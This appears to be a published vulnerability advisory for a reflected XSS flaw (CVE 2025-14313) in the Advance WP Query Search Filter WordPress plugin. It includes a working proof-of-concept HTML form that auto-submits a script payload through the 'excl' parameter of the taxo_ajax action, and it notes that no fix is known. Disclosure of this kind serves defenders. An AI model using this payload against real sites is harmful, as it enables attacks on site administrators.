Advance WP Query Search Filter <= 1.0.10 – Reflected XSS via taxo_ajax | CVE 2025-14313 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin

Proof of Concept

1. Install advance-wp-query-search-filter plugin
2. Use the following HTML PoC:

<html><body><form action="http://localhost:10013/wp-admin/admin-ajax.php?action=taxo_ajax" method="POST"><input type="hidden" name="excl" value="testXSS&quot;&gt;&lt;script&gt;alert&#40;1&#41;&lt;&#47;script&gt;" /><input type="submit"value="Submit request" /></form><script>document.forms[0].submit();</script></body></html>
3. XSS will trigger

Affects Plugins

advance-wp-query-search-filter

No known fix

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Yevgen Goncharuk

Submitter

Yevgen Goncharuk

Verified

Yes

WPVDB ID

5ebcdb32-da82-4129-8538-40d1b03a1108

Timeline

Publicly Published

2025-12-09 (about 21 days ago)

Added

2025-12-09 (about 21 days ago)

Last Updated

2025-12-09 (about 21 days ago)

Other

Published

Title

Published

2024-05-24

Title

Pray For Me <= 1.0.4 - Unauthenticated Stored XSS

Published

2024-11-01

Title

Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid & Carousel, Remote Arrows) < 5.10.2 - Authenticated (Contributor+) DOM-Based Stored Cross-Site Scripting via Custom Gallery Widget

Published

2023-09-25

Title

WP Matterport Shortcode < 2.1.7 - Reflected XSS

Published

2025-05-06

Title

Xavin's List Subpages <= 1.3 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2014-08-01

Title

Comment Attachment 1.0 - XSS